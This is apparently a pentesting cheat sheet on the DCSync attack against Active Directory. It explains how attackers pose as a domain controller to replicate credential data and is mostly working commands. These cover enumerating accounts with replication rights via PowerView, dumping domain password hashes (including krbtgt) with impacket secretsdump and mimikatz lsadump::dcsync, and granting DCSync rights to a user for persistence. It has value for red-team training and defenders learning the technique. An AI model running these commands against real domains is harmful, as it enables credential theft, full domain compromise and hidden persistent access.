# DC Synchronization The DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information using the Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled.\ By default only **Domain Admins, Enterprise Admins, Administrators, and Domain Controllers** groups have the required privileges *(Replicating Directory Changes, Replicating Directory Changes All and Replicating Directory Changes in Filtered Set)*. ## Enumeration With **PowerView** (a [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) script and there are two versions: [Old](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) and [New](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1)) enumerate for users with the required rights. {% code overflow="wrap" %} ```powershell Get-ObjectAcl -DistinguishedName "DC=Security,DC=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')} ``` {% endcode %} {% code overflow="wrap" %} ```powershell Get-ObjectACL "DC=security,DC=local" -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')} ``` {% endcode %} {% code overflow="wrap" %} ```powershell Get-ObjectAcl -DistinguishedName "DC=Security,DC=local" -ResolveGUIDs | ?{($_.IdentityReference -match "") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))} ``` {% endcode %} We can take the individual SID's and attempt to identify the related User Principal Names (UPN's). {% code overflow="wrap" %} ```powershell Get-ObjectAcl -Identity "dc=security,dc=local" -ResolveGUIDs | ? {$_.SecurityIdentifier -match "" ``` {% endcode %} {% code overflow="wrap" %} ```powershell wmic useraccount get name,sid ``` {% endcode %} ## Attack {% tabs %} {% tab title="Remotely" %} **Linux** With [impacket-secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py). {% code overflow="wrap" %} ```bash secretsdump.py -just-dc /:@ -outputfile dcsync_hashes ``` {% endcode %} {% code overflow="wrap" %} ```bash [-just-dc-user ] # To get only of that user [-hashes ] # To access with hash [-pwd-last-set] # To see when each account's password was last changed [-just-dc-ntlm] # Only NTLM hash [-user-status] # check if a user is disabled [-history] # To dump password history, may be helpful for offline password cracking ``` {% endcode %} {% endtab %} {% tab title="Locally" %} **Windows** With [mimikatz](https://github.com/gentilkiwi/mimikatz) {% code overflow="wrap" %} ```powershell lsadump::dcsync /domain: /user: ``` {% endcode %} {% code overflow="wrap" %} ```powershell lsadump::dcsync /user:krbtgt lsadump::dcsync /domain:security.local /user:new_admin lsadump::dcsync /user:security\krbtgt ``` {% endcode %} {% endtab %} {% endtabs %} ## Persistance **PowerView** (a [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) script and there are two versions: [Old](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) and [New](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1)) can be used to give a user object the DCSync rights for future exploitation. {% code overflow="wrap" %} ```powershell Add-ObjectACL -TargetDistinguishedName "DC=Security,DC=local" -PrincipalSamAccountName 'user' -Rights DCSync ``` {% endcode %} {% code overflow="wrap" %} ```powershell Add-ObjectACL -PrincipalIdentity -Rights DCSync ``` {% endcode %} Check {% code overflow="wrap" %} ```powershell Get-ObjectAcl -DistinguishedName "DC=Security,DC=local" -ResolveGUIDs | ?{$_.IdentityReference -match "user"} ``` {% endcode %}